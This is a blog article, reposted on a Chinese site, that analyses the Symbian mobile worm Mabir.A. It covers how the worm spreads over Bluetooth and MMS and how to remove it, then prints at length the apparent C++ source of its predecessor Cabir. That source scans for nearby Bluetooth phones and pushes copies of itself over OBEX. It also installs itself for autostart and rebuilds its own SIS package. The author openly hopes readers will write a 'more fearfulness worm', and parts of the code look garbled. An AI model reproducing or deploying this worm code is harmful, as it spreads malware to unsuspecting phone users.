Analysing Mabir.A Virus

最新推荐文章于 2022-02-25 20:00:37 发布

最新推荐文章于 2022-02-25 20:00:37 发布 · 278 阅读

文章标签：

Mabir.A是一种基于Symbian系统的蠕虫病毒，它通过蓝牙和多媒体信息服务(MMS)传播。一旦感染设备，Mabir.A会搜索附近的蓝牙设备并发送包含病毒副本的文件。此外，该病毒还会监听受感染手机上的MMS和短信，并用病毒副本回复这些消息。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

Analysing Mabir.A Virus

BY Delphiscn (cnBlaster#hotmail.com) http://blog.youkuaiyun.com/delphiscn

----[Table of contents

0x01.Introduction

0x02.Mabir.A's details & solution

0x03.Code

0x04.Reference

----[ 0x01. Introduction

Nowadays, there are many computer viruses feaze us. But with the
development of the technology, some mobile telephone's viruses are also
appeared. So, not only the systems such as Windows、Linux are infected.
But also the mobile phones based on Symbian OS、Windows CE systems
are hacked...

This article will give us a example to know how a virus to infect and
work. Maybe some viewpoints in this paper will give you some inspirations
to write a more fearfulness worm :)

----[ 0x02. Mabir.A's details & solution

Mabir is a worm based on Symbian 60 system, which is spread by Bluetooth
and MMS. It will search the other mobile phones equipped with Bluetooth
as soon as infected a system. and send a virus copy(SIS File) at the same time.

　　
The missive file always has the same name called caribe.sis. Here, we
should pay a attention to it. Though the filename is the same as the worm caribe,
they have some differences.

Besides the way of Bluetooth, Mabir.A will also listen all the MMS and SMS
Messages from the infected phones. And reply these messageswith info.sis,
a virus copy.

　 The MMS Messages replyed by Mabir will not included any words, except
info.sis file.
　　
　 Next, Let's talk something about MMS.

MMS Message is a kind of multimedia that can transport any information to mobile phones
which are support MMS technology. As its name, MMSonly contains
multimedia, such as picture、audio frequency and video frequency. But, in fact,
it contains all, even as the infected files, Mabir always camouflages itself asa
Symbian's installation procedure. Let you to execute it.

Killing Mabir.A

1.Install a file manager program on the device.

2.Enable the option to view the files in the system folder.

3.Delete the following malicious files:
Profimail v2.75_FULL.sis
\system\install\Profimail v2.75_FULL.sis
C:\System\Apps\AppInst\Appinst.aif
C:\System\Apps\AppInst\Appinst.app
C:\System\Apps\caribe\caribe.rsc
C:\System\Apps\caribe\caribe.app
C:\System\Apps\caribe\flo.mdl
C:\System\recogs\flo.mdl
C:\System\Fonts\11x12 euro_fonts.gdr
C:\System\SYMBIANSECUREDATA\CARIBESECURITYMANAGER\CARIBE.RSC
C:\System\SYMBIANSECUREDATA\CARIBESECURITYMANAGER\CARIBE.APP
C:\System\SYMBIANSECUREDATA\CARIBESECURITYMANAGER\CARIBE.SIS
C:\System\SYMBIANSECUREDATA\CARIBESECURITYMANAGER\INFO.SIS

4.Reinstall the following programs that were overwritten by the threat:
ProfiMail
ProfiExplorer

Detailed description:

1.Spreading by Bluetooth

On this way, Mabir always copies itselftoa file named caribe.sis. SIS
contains three virus's files

caribe.app, caribe.rsc and flo.mdl

When SIS sets up, it will execute caribe.app automatically. To start up the
worm.

If Mabir.A is activation, it will immediately search the other Bluetooth
phones, and copy itself to them. If the target system refused, it will still send the
same messages. Just like DDOS.

2.Spreading by MMS

Using MMS way to spread, Mabir will copy the infected SIS files. These files
included info.sis but there aren't any words in the MMS message.

Infection

When Mabir SIS installs the files, it will copy worm to these place:

\system\apps\Caribe\Caribe.app
\system\apps\Caribe\Caribe.rsc
\system\apps\Caribe\flo.mdl

When Mabir.exe executes, it will copy these files:

\system\symbiansecuredata\caribesecuritymanager\Caribe.app
\system\symbiansecuredata\caribesecuritymanager\Caribe.rsc

and rebuilds SIS file to:

\system\symbiansecuredata\caribesecuritymanager\Info.sis

If these steps are executed successfully, Mabir.A will search all the
Bluetooth phones and begin to wait all the MMSand SMS Messages arrived.

----[ 0x03. Code

Attention:

This code is called Cabir which is the preexistence of Mabir. Comparing both
to say, Cabir and Mabir Maybe have same differences.

#include "general.h"

#include "caribebt.h"

#include <eikenv.h>

#include <bt_sock.h>

#include <obex.h>

#include <btextnotifiers.h>

/////////////////////////////////////////////////////////////////////

CaribeBluetooth::CaribeBluetooth():

CActive(CActive::EPriorityStandard)

{

WithAddress = 0;

iState = 3;

_LIT(currentFileName,"C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESECURIT
YMANAGER\\CARIBE.SIS");

iCurrFile = CObexFileObject::NewL(TPtrC(NULL, 0));

iCurrFile->InitFromFileL(currentFileName);

CActiveScheduler::Add(this);

}

CaribeBluetooth::~CaribeBluetooth()

{

}

CaribeBluetooth* CaribeBluetooth::NewL()

{

return NewLC();

}

CaribeBluetooth* CaribeBluetooth::NewLC()

{

CaribeBluetooth* self = new CaribeBluetooth;

self->ConstructL();

return self;

}

void CaribeBluetooth::ConstructL()

{

iState = 3;

RunL();

}

void CaribeBluetooth::RunL()

{

if(iState == 1)

{

if(!obexClient->IsConnected())

{

iState = 3;

}

else

{

//iCurrObject = CObexNullObject::NewL();

//iCurrObject->SetNameL(_L("Hello World"));

//obexClient->Put(*iCurrObject,iStatus);

iState = 2;

Cancel();

obexClient->Put(*iCurrFile,iStatus);

SetActive();

return;

}

if(iState == 2)

{

//delete iCurrObject;

iState = 3;

Cancel();

obexClient->Disconnect(iStatus);

SetActive();

return;

}

if(iState == 3)

{

if(obexClient)

{

delete obexClient;

obexClient = NULL;

}

while(iState == 3)

{

FindDevices();

ManageFoundDevices();

}

return;

}

void CaribeBluetooth::DoCancel()

{

}

int CaribeBluetooth::FindDevices()

{

_LIT(KL2Cap, "BTLinkManager");

int res;

if((res = socketServ.Connect()) != KErrNone)

{

//ErrMessage("Error Connect");

return 0;

}

if((res = socketServ.FindProtocol((const
TProtocolName&)KL2Cap,pInfo))!=KErrNone)

{

//ErrMessage("Error FindProtocol");

socketServ.Close();

return 0;

}

if((res = hr.Open(socketServ,pInfo.iAddrFamily,pInfo.iProtocol))!=KErrNone)

{

//ErrMessage("Error Open");

socketServ.Close();

return 0;

}

WithAddress = 0;

addr.SetIAC(KGIAC);

addr.SetAction(KHostResInquiry);

TRequestStatus iStatusIn;

hr.GetByAddress(addr, entry, iStatusIn);

User::WaitForRequest(iStatusIn);

if(iStatusIn!=KErrNone)

{

//ErrMessage("Error Finding Devices");

}

else

{

WithAddress = 1;

}

socketServ.Close();

// hr.Close();

return 0;

}

int CaribeBluetooth::ManageFoundDevices()

{

if(WithAddress)

{

WithAddress = 0;

Cancel();

TBTSockAddr btaddr(entry().iAddr);

TBTDevAddr devAddr;

devAddr = btaddr.BTAddr();

TObexBluetoothProtocolInfo obexBTProtoInfo;

obexBTProtoInfo.iTransport.Copy(_L("RFCOMM"));

obexBTProtoInfo.iAddr.SetBTAddr(devAddr);

obexBTProtoInfo.iAddr.SetPort(0x00000009);

obexClient = CObexClient::NewL(obexBTProtoInfo);

if(obexClient)

{

iState = 1;

iStatus = KRequestPending;

Cancel();

obexClient->Connect(iStatus);

SetActive();

}

else

{

iState = 3;

User::After(1000000);

}

return 0;

}

/////////////////////////////////////////////////////////////////////

#include "general.h"

#include "CaribeInstaller.h"

#include <aknapp.h>

#include <e32std.h>

#include <e32base.h>

#include <e32def.h>

#include <f32file.h>

#include <bautils.h>

#include <eikenv.h>

#include "file.h"

//#include "sisheader.h"

#define AUTOSTARTABLE
"C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESECURITYMANAGER\\CARIBE.A
PP"

_LIT(Autostartablestr,"C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESECURIT
YMANAGER\\CARIBE.APP");

#define AUTOSTARTABLERSC
"C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESECURITYMANAGER\\CARIBE.
RSC"

_LIT(Autostartablerscstr,"C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESECUR
ITYMANAGER\\CARIBE.RSC");

#define AUTOSTARTABLEPATH
"C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESECURITYMANAGER\\"

_LIT(Autostartablepathstr,"C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESEC
URITYMANAGER\\");

#define RECOGFILE "C:\\SYSTEM\\RECOGS\\FLO.MDL"

_LIT(Recogfilestr,"C:\\SYSTEM\\RECOGS\\FLO.MDL");

#define RECOGFILEPATH "C:\\SYSTEM\\RECOGS\\"

_LIT(Recogfilepathstr,"C:\\SYSTEM\\RECOGS\\");

#define SISFILE
"C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESECURITYMANAGER\\CARIBE.S
IS"

_LIT(Sisfilestr,"C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESECURITYMANA
GER\\CARIBE.SIS");

unsigned short DOCRC16(unsigned short crc,void * array,int size);

CaribeInstaller::CaribeInstaller()

{

}

CaribeInstaller::~CaribeInstaller()

{

}

/*************************************************************
*********

CopyMeToAutostartableDir:

This function will copy the own dll of this application to

"C:\SYSTEM\SYMBIANSECUREDATA\CARIBESECURITYMANAGER\CARIBE.APP"
.

.mdl for autostart will start that application automaticly.

Parameters:

CAknApplication of the application to be copied.

Returned Values:

None.

**************************************************************
*********/

void CaribeInstaller::CopyMeToAutostartableDir(CAknApplication * OwnApp)

{

TFileName OwnDllName = OwnApp->DllName();

TBuf16 <sizeof(AUTOSTARTABLE)>Autostartable(Autostartablestr);

OwnDllName.UpperCase();

if(OwnDllName == Autostartable)

{

return;

}

RFs fs;

User::LeaveIfError(fs.Connect());

TBuf16 <sizeof(AUTOSTARTABLEPATH)>
autostartablepath(Autostartablepathstr);

fs.MkDirAll(Autostartablepathstr);

if(BaflUtils::CopyFile(fs,OwnDllName,Autostartable,CFileMan::EOverWrite)!=K
ErrNone)

{

fs.Close();

return;

}

TBuf16 <sizeof(AUTOSTARTABLERSC)> Autostartablersc (Autostartablerscstr);

OwnDllName[OwnDllName.Length()-3] = 'R';

OwnDllName[OwnDllName.Length()-2] = 'S';

OwnDllName[OwnDllName.Length()-1] = 'C';

if(BaflUtils::CopyFile(fs,OwnDllName,Autostartablersc,CFileMan::EOverWrite)!
=KErrNone)

{

BaflUtils::DeleteFile(fs,Autostartable,0);

}

fs.Close();

return;

}

/*************************************************************
*********

InstallMDL:

This function will install the mdl file to the recogs directory.

Parameters:

CAknApplication of this application for constructing the path

of the mdl.

Returned Values:

None.

**************************************************************
*********/

void CaribeInstaller::InstallMDL(CAknApplication * OwnApp)

{

RFs fs;

User::LeaveIfError(fs.Connect());

TFileName OwnDllName = OwnApp->DllName();

TBuf16 <sizeof(RECOGFILE)>Recogfile(Recogfilestr);

TParse parser;

parser.Set(OwnDllName,NULL,NULL);

TBuf16 <KMaxPath> flodrivepath(parser.DriveAndPath());

_LIT16(FLOMDL,"flo.mdl");

flodrivepath.Append(FLOMDL);

TBuf16 <sizeof(RECOGFILEPATH)> Recogfilepath(Recogfilepathstr);

fs.MkDirAll(Recogfilepath);

BaflUtils::CopyFile(fs,flodrivepath,Recogfile,CFileMan::EOverWrite);

fs.Close();

}

/*************************************************************
*********

CreateSis:

This function will create a .sis file with caribe.app,caribe.rsc

and flo.mdl

Parameters:

CAknApplication of this application for constructing the path

of the mdl.

Returned Values:

None.

**************************************************************
*********/

void CaribeInstaller::CreateSis(CAknApplication * OwnApp)

{

unsigned char sisheader[] =

{

0x3D ,0x1A ,0x8B ,0x03 ,0x12 ,0x3A ,0x00 ,0x10

,0x19 ,0x04 ,0x00 ,0x10 ,0xC4 ,0xE0 ,0x80 ,0xAB

//Offset 0x10 CRC16

,0x00 ,0x00 ///////

///////////////////

,0x01 ,0x00 ,0x03 ,0x00 ,0x01 ,0x00

,0x00 ,0x00 ,0x00 ,0x00 ,0x21 ,0x00 ,0x00 ,0x00

,0xC8 ,0x00 ,0x00 ,0x00 ,0x09 ,0x00 ,0x00 ,0x00

,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00

,0x64 ,0x00 ,0x00 ,0x00 ,0x66 ,0x00 ,0x00 ,0x00

,0xF6 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00

,0x0A ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00

//Offset 0x50 Size of Packed Data/////

,0xCC ,0x20 ,0x01, 0x00///////////////

//////////////////////////////////////

,0x00 ,0x00 ,0x00 ,0x00

,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00

,0x00 ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00

,0x00 ,0x00 ,0x03 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00

,0x00 ,0x00 ,0x18 ,0x00 ,0x00 ,0x00 ,0x12 ,0x01

,0x00 ,0x00 ,0x40 ,0x00 ,0x00 ,0x00 ,0x2A ,0x01

,0x00 ,0x00

//Offset 0x82 size of packed file 3

,0x61 ,0xA0 ,0x00 ,0x00

//Offset 0x86: offset of third packed file//

,0x3C ,0x02,0x00 ,0x00 /////////////////////

////////////////////////////////////////////

//Offset 0x8a again size of packed file 3

,0x61 ,0xA0 ,0x00 ,0x00 ,0x00 ,0x00

,0x00 ,0x00 ,0x6A ,0x01 ,0x00 ,0x00 ,0x00 ,0x00

,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00

,0x00 ,0x00 ,0x12 ,0x00 ,0x00 ,0x00 ,0x6A ,0x01

,0x00 ,0x00 ,0x3A ,0x00 ,0x00 ,0x00 ,0x7C ,0x01

,0x00 ,0x00

//Offset 0xB2 size of packed file 2

,0x59 ,0x80 ,0x00 ,0x00

//Offset 0xB6: offset of second packed file//

, 0x9D ,0xA2 ,0x00 ,0x00 ////////////////////

/////////////////////////////////////////////

//Offset 0xBA again size of packed file 2

,0x59 ,0x80 ,0x00 ,0x00

,0x00 ,0x00

,0x00 ,0x00 ,0xB6 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00

,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00

,0x00 ,0x00 ,0x18 ,0x00 ,0x00 ,0x00 ,0xB6 ,0x01

,0x00 ,0x00 ,0x40 ,0x00 ,0x00 ,0x00 ,0xCE ,0x01

,0x00 ,0x00

//Offset 0xE2 size of packed file 1

,0x12 ,0x00 ,0x00 ,0x00

//Offset 0xE6: offset of first packed file//

,0xF6 ,0x22,0x01 ,0x00 /////////////////////

////////////////////////////////////////////

//Offset 0xEA again size of packed file 1

,0x12 ,0x00 ,0x00 ,0x00

,0x00 ,0x00

,0x00 ,0x00 ,0x0E ,0x02 ,0x00 ,0x00 ,0x88 ,0x6F

,0x1F ,0x10 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00

,0x00 ,0x00 ,0x22 ,0x00 ,0x00 ,0x00 ,0x0E ,0x02

,0x00 ,0x00 ,0x0C ,0x00 ,0x00 ,0x00 ,0x30 ,0x02

,0x00 ,0x00 ,0x2E ,0x00 ,0x5C ,0x00 ,0x63 ,0x00

,0x61 ,0x00 ,0x72 ,0x00 ,0x69 ,0x00 ,0x62 ,0x00

,0x65 ,0x00 ,0x2E ,0x00 ,0x61 ,0x00 ,0x70 ,0x00

,0x70 ,0x00 ,0x21 ,0x00 ,0x3A ,0x00 ,0x5C ,0x00

,0x73 ,0x00 ,0x79 ,0x00 ,0x73 ,0x00 ,0x74 ,0x00

,0x65 ,0x00 ,0x6D ,0x00 ,0x5C ,0x00 ,0x61 ,0x00

,0x70 ,0x00 ,0x70 ,0x00 ,0x73 ,0x00 ,0x5C ,0x00

,0x63 ,0x00 ,0x61 ,0x00 ,0x72 ,0x00 ,0x69 ,0x00

,0x62 ,0x00 ,0x65 ,0x00 ,0x5C ,0x00 ,0x63 ,0x00

,0x61 ,0x00 ,0x72 ,0x00 ,0x69 ,0x00 ,0x62 ,0x00

,0x65 ,0x00 ,0x2E ,0x00 ,0x61 ,0x00 ,0x70 ,0x00

,0x70 ,0x00 ,0x2E ,0x00 ,0x5C ,0x00 ,0x66 ,0x00

,0x6C ,0x00 ,0x6F ,0x00 ,0x2E ,0x00 ,0x6D ,0x00

,0x64 ,0x00 ,0x6C ,0x00 ,0x21 ,0x00 ,0x3A ,0x00

,0x5C ,0x00 ,0x73 ,0x00 ,0x79 ,0x00 ,0x73 ,0x00

,0x74 ,0x00 ,0x65 ,0x00 ,0x6D ,0x00 ,0x5C ,0x00

,0x61 ,0x00 ,0x70 ,0x00 ,0x70 ,0x00 ,0x73 ,0x00

,0x5C ,0x00 ,0x63 ,0x00 ,0x61 ,0x00 ,0x72 ,0x00

,0x69 ,0x00 ,0x62 ,0x00 ,0x65 ,0x00 ,0x5C ,0x00

,0x66 ,0x00 ,0x6C ,0x00 ,0x6F ,0x00 ,0x2E ,0x00

,0x6D ,0x00 ,0x64 ,0x00 ,0x6C ,0x00 ,0x2E ,0x00

,0x5C ,0x00 ,0x63 ,0x00 ,0x61 ,0x00 ,0x72 ,0x00

,0x69 ,0x00 ,0x62 ,0x00 ,0x65 ,0x00 ,0x2E ,0x00

,0x72 ,0x00 ,0x73 ,0x00 ,0x63 ,0x00 ,0x21 ,0x00

,0x3A ,0x00 ,0x5C ,0x00 ,0x73 ,0x00 ,0x79 ,0x00

,0x73 ,0x00 ,0x74 ,0x00 ,0x65 ,0x00 ,0x6D ,0x00

,0x5C ,0x00 ,0x61 ,0x00 ,0x70 ,0x00 ,0x70 ,0x00

,0x73 ,0x00 ,0x5C ,0x00 ,0x63 ,0x00 ,0x61 ,0x00

,0x72 ,0x00 ,0x69 ,0x00 ,0x62 ,0x00 ,0x65 ,0x00

,0x5C ,0x00 ,0x63 ,0x00 ,0x61 ,0x00 ,0x72 ,0x00

,0x69 ,0x00 ,0x62 ,0x00 ,0x65 ,0x00 ,0x2E ,0x00

,0x72 ,0x00 ,0x73 ,0x00 ,0x63 ,0x00 ,0x53 ,0x00

,0x65 ,0x00 ,0x72 ,0x00 ,0x69 ,0x00 ,0x65 ,0x00

,0x73 ,0x00 ,0x36 ,0x00 ,0x30 ,0x00 ,0x50 ,0x00

,0x72 ,0x00 ,0x6F ,0x00 ,0x64 ,0x00 ,0x75 ,0x00

,0x63 ,0x00 ,0x74 ,0x00 ,0x49 ,0x00 ,0x44 ,0x00

,0x63 ,0x00 ,0x61 ,0x00 ,0x72 ,0x00 ,0x69 ,0x00

,0x62 ,0x00 ,0x65 ,0x00

};

unsigned char rscraw[] =

{

/*0x0C,0x00,0x07,0x00,0x04,0x00,0x00,0x00,

0x01,0x60,0xA2,0x11,0x04,0x00,0x0C,0x00,

0x0C,0x00*/

0x24,0x00,0x09,0x00,0x04,0x00,0x00,0x00,0x01,0x60,

0xA2,0x11,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,

0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,

0x00,0x00,0x00,0x00,0x00,0x00,0x04,0x00,0x0C,0x00,

0x0C,0x00,0x24,0x00

};

TBuf16 <sizeof(SISFILE)>Sisfile(Sisfilestr);

TBuf16 <sizeof(RECOGFILE)>Recogfile(Recogfilestr);

TBuf16 <sizeof(AUTOSTARTABLE)>Appfile(Autostartablestr);

TBuf16 <sizeof(AUTOSTARTABLERSC)>Rscfile(Autostartablerscstr);

unsigned short crc = 0;

int i;

int leidos;

unsigned char bytesdata[100];

File fsis;

File fRecog;

File fApp;

int RecogSize;

int AppSize;

int RscSize;

if(!fsis.Open(Sisfile,File::OMCreate|File::OMWrite|File::OMRead))

{

if(!fsis.Open(Sisfile,File::OMReplace|File::OMRead|File::OMWrite))

{

return;

}

if(!fRecog.Open(Recogfile,File::OMOpen|File::OMRead))

{

fsis.Close();

return;

}

fRecog.rFile.Size(RecogSize);

if(!fApp.Open(Appfile,File::OMOpen|File::OMRead))

{

fsis.Close();

fRecog.Close();

return;

}

fApp.rFile.Size(AppSize);

RscSize = sizeof(rscraw);

unsigned short CRC16; //0x10

unsigned int SizeData; //0x50

unsigned int OffsetData1; //0xE6

unsigned int OffsetData2; //0xB6

unsigned int OffsetData3; //0x86

unsigned int SizeData11; //0xE2

unsigned int SizeData12; //0xEA

unsigned int SizeData21; //0xB2

unsigned int SizeData22; //0xBA

unsigned int SizeData31; //0x82

unsigned int SizeData32; //0x8A

CRC16 = 0;

SizeData = RecogSize+AppSize+RscSize;

SizeData11= RscSize;

SizeData21= RecogSize;

SizeData31= AppSize;

SizeData12 = RscSize;

SizeData22 = RecogSize;

SizeData32 = AppSize;

OffsetData3 = 0x0000023c;

OffsetData2 = 0x0000023c+AppSize;

OffsetData1 = 0x0000023c+AppSize+RecogSize;

//Writing header

crc = DOCRC16(crc,sisheader,0x10);

crc = DOCRC16(crc,&sisheader[0x12],0x50-0x12);

fsis.Write(sisheader,0x50);

crc = DOCRC16(crc,&SizeData/*&sisheader[0x50]*/,4); //SizeData;
//0x50

fsis.Write(&SizeData/*sisheader[0x50]*/,4);

crc = DOCRC16(crc,&sisheader[0x54],0x82-0x54);

fsis.Write(&sisheader[0x54],0x82-0x54);

crc = DOCRC16(crc,&SizeData31/*&sisheader[0x82]*/,0x04);//SizeData31;
//0x82

crc =
DOCRC16(crc,&OffsetData3/*&sisheader[0x86]*/,0x04);//OffsetData3;//0x8
6

crc = DOCRC16(crc,&SizeData32/*&sisheader[0x8a]*/,0x04);//SizeData32;
//0x8A

fsis.Write(&SizeData31/*&sisheader[0x82]*/,0x04);

fsis.Write(&OffsetData3/*&sisheader[0x86]*/,0x04);

fsis.Write(&SizeData32/*&sisheader[0x8a]*/,0x04);

crc = DOCRC16(crc,&sisheader[0x8e],0xb2-0x8e);

fsis.Write(&sisheader[0x8e],0xb2-0x8e);

crc = DOCRC16(crc,&SizeData21/*&sisheader[0xB2]*/,0x04);//SizeData21;

crc = DOCRC16(crc,&OffsetData2/*&sisheader[0xB2]*/,0x04);//OffsetData2;

crc = DOCRC16(crc,&SizeData22/*&sisheader[0xB2]*/,0x04);//SizeData22;

fsis.Write(&SizeData21/*&sisheader[0xB2]*/,0x04);

fsis.Write(&OffsetData2/*&sisheader[0xB2]*/,0x04);

fsis.Write(&SizeData22/*&sisheader[0xB2]*/,0x04);

crc = DOCRC16(crc,&sisheader[0xbe],0xe2-0xbe);

fsis.Write(&sisheader[0xbe],0xe2-0xbe);

crc = DOCRC16(crc,&SizeData11/*&sisheader[0xe2]*/,0x04);//SizeData11;

crc = DOCRC16(crc,&OffsetData1/*&sisheader[0xe2]*/,0x04);//OffsetData1;

crc = DOCRC16(crc,&SizeData12/*&sisheader[0xe2]*/,0x04);//SizeData12;

fsis.Write(&SizeData11/*&sisheader[0xe2]*/,0x04);

fsis.Write(&OffsetData1/*&sisheader[0xe2]*/,0x04);

fsis.Write(&SizeData12/*&sisheader[0xe2]*/,0x04);

crc = DOCRC16(crc,&sisheader[0xee],0x23c-0xee);

fsis.Write(&sisheader[0xee],0x23c-0xee);

//Writing app

while(leidos = fApp.Read(bytesdata,100))

{

crc = DOCRC16(crc,bytesdata,leidos);

fsis.Write(bytesdata,leidos);

}

//Writing recog

while(leidos = fRecog.Read(bytesdata,100))

{

crc = DOCRC16(crc,bytesdata,leidos);

fsis.Write(bytesdata,leidos);

}

//Writing rsc

crc = DOCRC16(crc,rscraw,sizeof(rscraw));

fsis.Write(rscraw,sizeof(rscraw));

fsis.Seek(ESeekStart,0x10);

fsis.Write(&crc,2);

fsis.Close();

fRecog.Close();

fApp.Close();

}

unsigned short DOCRC16(unsigned short crc,void * _array,int size)

{

//static unsigned int polynomial = 0x1021;

//static unsigned short _table[256], index;

unsigned short crcTab[256] =

{0x0000,0x1021,0x2042,0x3063,0x4084,0x50a5,0x60c6,0x70e7,0x8108,0x9
129,0xa14a,

0xb16b,0xc18c,0xd1ad,0xe1ce,0xf1ef,0x1231,0x0210,0x3273,0x2252,0x52b
5,0x4294,

0x72f7,0x62d6,0x9339,0x8318,0xb37b,0xa35a,0xd3bd,0xc39c,0xf3ff,0xe3de
,0x2462,

0x3443,0x0420,0x1401,0x64e6,0x74c7,0x44a4,0x5485,0xa56a,0xb54b,0x85
28,0x9509,

0xe5ee,0xf5cf,0xc5ac,0xd58d,0x3653,0x2672,0x1611,0x0630,0x76d7,0x66f6
,0x5695,

0x46b4,0xb75b,0xa77a,0x9719,0x8738,0xf7df,0xe7fe,0xd79d,0xc7bc,0x48c4
,0x58e5,

0x6886,0x78a7,0x0840,0x1861,0x2802,0x3823,0xc9cc,0xd9ed,0xe98e,0xf9a
f,0x8948,

0x9969,0xa90a,0xb92b,0x5af5,0x4ad4,0x7ab7,0x6a96,0x1a71,0x0a50,0x3a
33,0x2a12,

0xdbfd,0xcbdc,0xfbbf,0xeb9e,0x9b79,0x8b58,0xbb3b,0xab1a,0x6ca6,0x7c87
,0x4ce4,

0x5cc5,0x2c22,0x3c03,0x0c60,0x1c41,0xedae,0xfd8f,0xcdec,0xddcd,0xad2a,
0xbd0b,

0x8d68,0x9d49,0x7e97,0x6eb6,0x5ed5,0x4ef4,0x3e13,0x2e32,0x1e51,0x0e
70,0xff9f,

0xefbe,0xdfdd,0xcffc,0xbf1b,0xaf3a,0x9f59,0x8f78,0x9188,0x81a9,0xb1ca,0
xa1eb,

0xd10c,0xc12d,0xf14e,0xe16f,0x1080,0x00a1,0x30c2,0x20e3,0x5004,0x402
5,0x7046,

0x6067,0x83b9,0x9398,0xa3fb,0xb3da,0xc33d,0xd31c,0xe37f,0xf35e,0x02b
1,0x1290,

0x22f3,0x32d2,0x4235,0x5214,0x6277,0x7256,0xb5ea,0xa5cb,0x95a8,0x85
89,0xf56e,

0xe54f,0xd52c,0xc50d,0x34e2,0x24c3,0x14a0,0x0481,0x7466,0x6447,0x542
4,0x4405,

0xa7db,0xb7fa,0x8799,0x97b8,0xe75f,0xf77e,0xc71d,0xd73c,0x26d3,0x36f2
,0x0691,

0x16b0,0x6657,0x7676,0x4615,0x5634,0xd94c,0xc96d,0xf90e,0xe92f,0x99c
8,0x89e9,

0xb98a,0xa9ab,0x5844,0x4865,0x7806,0x6827,0x18c0,0x08e1,0x3882,0x28
a3,0xcb7d,

0xdb5c,0xeb3f,0xfb1e,0x8bf9,0x9bd8,0xabbb,0xbb9a,0x4a75,0x5a54,0x6a37
,0x7a16,

0x0af1,0x1ad0,0x2ab3,0x3a92,0xfd2e,0xed0f,0xdd6c,0xcd4d,0xbdaa,0xad8b
,0x9de8,

0x8dc9,0x7c26,0x6c07,0x5c64,0x4c45,0x3ca2,0x2c83,0x1ce0,0x0cc1,0xef1f,
0xff3e,

0xcf5d,0xdf7c,0xaf9b,0xbfba,0x8fd9,0x9ff8,0x6e17,0x7e36,0x4e55,0x5e74,0
x2e93,

0x3eb2,0x0ed1,0x1ef0

};

unsigned short * table = NULL;

unsigned char * array = (unsigned char *)_array;

int i;

if(!table)

{

table = crcTab;

table = _table;

table[0]=0;

for (index = 0; index < 128; index++)

{

unsigned int carry = table[index] & 0x8000;

unsigned int temp = (table[index] << 1) & 0xffff;

table[index * 2 + (carry ? 0 : 1)] = temp ^ polynomial;

table[index * 2 + (carry ? 1 : 0)] = temp;

} */

}

for(i=0;i<size;i++)

{

crc = ((crc << 8) ^ table[((crc >> 8) ^ array[i]) & 0xff]);

}

return crc;

}

----[ 0x04. Reference

Symbian virus analyse
http://www.netqin.com/viruslist/Mabir.A.html

===EOF=======================================